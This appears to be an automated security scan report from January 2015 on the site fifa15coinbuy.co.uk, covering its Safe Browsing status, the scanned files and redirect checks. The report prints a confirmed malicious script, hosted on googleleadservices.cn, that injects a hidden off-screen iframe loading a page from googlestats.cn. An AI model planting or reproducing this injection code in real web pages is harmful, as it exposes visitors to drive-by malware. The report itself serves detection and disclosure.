Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fifa15coinbuy.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.fifa15coinbuy.co.uk/ | 200 OK Content-Length: 29778 Content-Type: text/html | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://wikipedia-org.cn/click.js | 200 OK Content-Length: 12803 Content-Type: text/javascript | clean |
https://mylivechat.com/chatinline.aspx?hccid=30135830 | HTTP/1.1 302 Found Cache-Control: private Date: Thu, 08 Jan 2015 19:43:47 GMT Location: https://s3.mylivechat.com/livechat/livechat.aspx?hccid=30135830&apimode=chatinline Server: Microsoft-IIS/8.5 Content-Length: 203 Content-Type: text/plain; charset=utf-8 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
https://s3.mylivechat.com/livechat/livechat.aspx?hccid=30135830&apimode=chatinline | 200 OK Content-Length: 7088 Content-Type: text/javascript | clean |
http://js.users.51.la/17201935.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.fifa15coinbuy.co.uk/page/2/ | 200 OK Content-Length: 30171 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/3/ | 200 OK Content-Length: 42827 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/4/ | 200 OK Content-Length: 30598 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/5/ | 200 OK Content-Length: 30177 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/6/ | 200 OK Content-Length: 30402 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/7/ | 200 OK Content-Length: 30664 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/8/ | 200 OK Content-Length: 30192 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/9/ | 200 OK Content-Length: 29432 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/10/ | 200 OK Content-Length: 30026 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/11/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Result:
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Referer: http://www.google.com/search?q=fifa15coinbuy.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Referer: http://www.google.com/search?q=fifa15coinbuy.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.